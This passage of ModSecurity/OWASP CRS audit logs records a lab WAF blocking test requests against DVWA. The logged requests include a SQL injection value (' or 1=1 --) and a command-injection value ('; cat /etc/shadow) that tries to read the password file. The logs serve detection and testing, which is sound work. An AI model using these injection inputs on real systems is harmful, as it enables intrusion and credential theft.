\"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":718,"p2":3098,"p3":0,"p4":0,"p5":203,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:35 --0400","transaction_id":"WRcQk38AAQEAAAkW4RcAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":389,"p2":2202,"p3":0,"p4":0,"p5":118,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:38 --0400","transaction_id":"WRcQln8AAQEAAAkW4RgAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":388,"p2":2135,"p3":0,"p4":0,"p5":120,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:33 --0400","transaction_id":"WRcQzX8AAQEAAAkXs@IAAAAC","remote_address":"192.168.75.130","remote_port":46232,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQzX8AAQEAAAkXs@IAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":718,"p2":2422,"p3":193,"p4":541,"p5":84,"sr":29,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:34 --0400","transaction_id":"WRcQzX8AAQEAAAkXs@MAAAAC","remote_address":"192.168.75.130","remote_port":46232,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQzX8AAQEAAAkXs@MAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":627,"p2":1526,"p3":80,"p4":371,"p5":76,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:44 --0400","transaction_id":"WRcQ2H8AAQEAAAkYuEYAAAAD","remote_address":"192.168.75.130","remote_port":46234,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"43"},"body":["ip=%27%3B+cat+%2Fetc%2Fshadow&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"]","Warning. Pattern match 